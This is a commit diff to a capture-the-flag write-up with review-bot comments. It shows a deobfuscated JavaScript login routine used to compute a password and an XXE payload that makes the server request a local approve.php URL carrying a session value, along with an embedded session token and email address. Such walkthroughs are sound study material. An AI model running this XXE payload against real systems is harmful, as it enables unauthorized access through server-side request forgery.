Commit 1dbe4e0a authored by Cool Fire (HN)

More colours

parent cda57fe7
......@@ -5,9 +5,10 @@ The logo contains the text which contains the URL for the next phase. We just ne
# Phase 2
Protip: tell chrome to ignore that one breakpoint that triggers every second.
There is an obfuscated JS section at the end of a JS file, let Firefox scratchpad run it and print the result with `console.log()` to get this deobfuscated function:
```
```javascript
function login() {
var key = "i want to win the pwctf!";
var uid = document.location.search.split('=')[1];
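Review bot: The sentence introducing this listing ("There is an obfuscated JS section at the end of a JS file") does not say which JS file, so a reader cannot find the section being deobfuscated; name the file there. The same sentence is a comma splice and reads better split before "let Firefox scratchpad run it". Since the step has the reader execute the challenge's obfuscated script in their own browser, it is worth saying to do so in a throwaway profile.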
......@@ -32,7 +33,7 @@ function login() {
Then simplify the code down a little and stick your uid in it to calculate and print the correct pass:
```
```javascript
var key = 'i want to win the pwctf!';
var uid = '32177e59ac87d481b8ad10a69c811537';
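Review bot: The `uid` literal on the second line of this snippet is one specific account's value, while the sentence above it says to "stick your uid in it"; mark the literal as an example value with a comment on that line so readers do not copy it unchanged. The `key` string here uses single quotes and the `login()` listing uses double quotes for the same string; using one style in both makes the two listings easier to compare.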
......@@ -59,6 +60,6 @@ The registration page sends XML data in a POST request, we can use XXE and a rem
replay the request through burp with the XXE included:
```
```xml
<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY sp SYSTEM "http://localhost/approve.php?session=s%253Ae2Efka7vpc4DUXWg5MsXft21xgkAvYGM.EFMK13ksf8irpWSMkZk3bcwWL4URZLZnytaBPeZbrv8">]><user><name>cFire</name><email>coolfire@insomnia247.nl</email></user><r>&sp;</r>
```
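Review bot: The `session=` parameter in the `SYSTEM` URL of the xml block commits what looks like a complete session value, along with an email address in the `<email>` element, to the repository; if either is still in use, replace them with clearly marked placeholders. The value is URL-encoded twice (`%253A`) and the writeup does not say why, so a sentence explaining that would help readers follow the request. The payload is also a single long line; breaking it after the DOCTYPE declaration would make the entity definition and the `&sp;` reference easier to read.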